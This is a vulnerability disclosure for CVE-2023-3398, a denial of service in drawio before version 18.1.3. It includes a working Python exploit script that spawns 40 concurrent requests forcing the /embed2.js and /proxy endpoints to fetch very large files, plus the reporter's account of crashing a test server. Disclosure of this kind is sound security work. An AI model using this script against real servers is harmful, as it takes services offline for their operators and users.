Headline
CVE-2023-3398: proxying Big files leads to potential DOS in drawio
Denial of Service in GitHub repository jgraph/drawio prior to 18.1.3.
Description
consider following script
exploit.py
put drawio_docker_instace your address and also big_file_address should be serve a big image file ( > 250 MB)
from multiprocessing import Process
import requests
def fun():
try:
requests.get("http://drawio_docker_instace/embed2.js?fetch=http://big_file_address/1.jpg")
#requests.get("http://drawio_docker_instace/proxy?url=http://big_file_address/1.jpg")
print("OK")
except:
print("error from server")
def main():
for i in range(1,40):
p = Process(target=fun, args=())
p.start()
if __name__ == '__main__':
main()
I upload forty 250MB photos at the same time, and the server hangs up ( I test it on upcloud basic server plan) both /proxy and /embed2.js was vulnerable to DOS and /embed2.js was more vulnerable as I saw in docker status you can check it yourself with my POC.py file
Proof of Concept
The POC is for the /embed2.js endpoint and for the /proxy endpoint we should increase the number of simultaneously Processes https://drive.google.com/file/d/1p52S-Rcp0p_5od8NUtz4DHpte4EZj6Ks/view?usp=sharing
Impact
High damage on Availability of server, In my tests the docker instance was stopped working. because the drawio ran on the same docker of the mentioned methods, then the whole application can be damaged by this attack. So I prefer set the availability of CVSS to high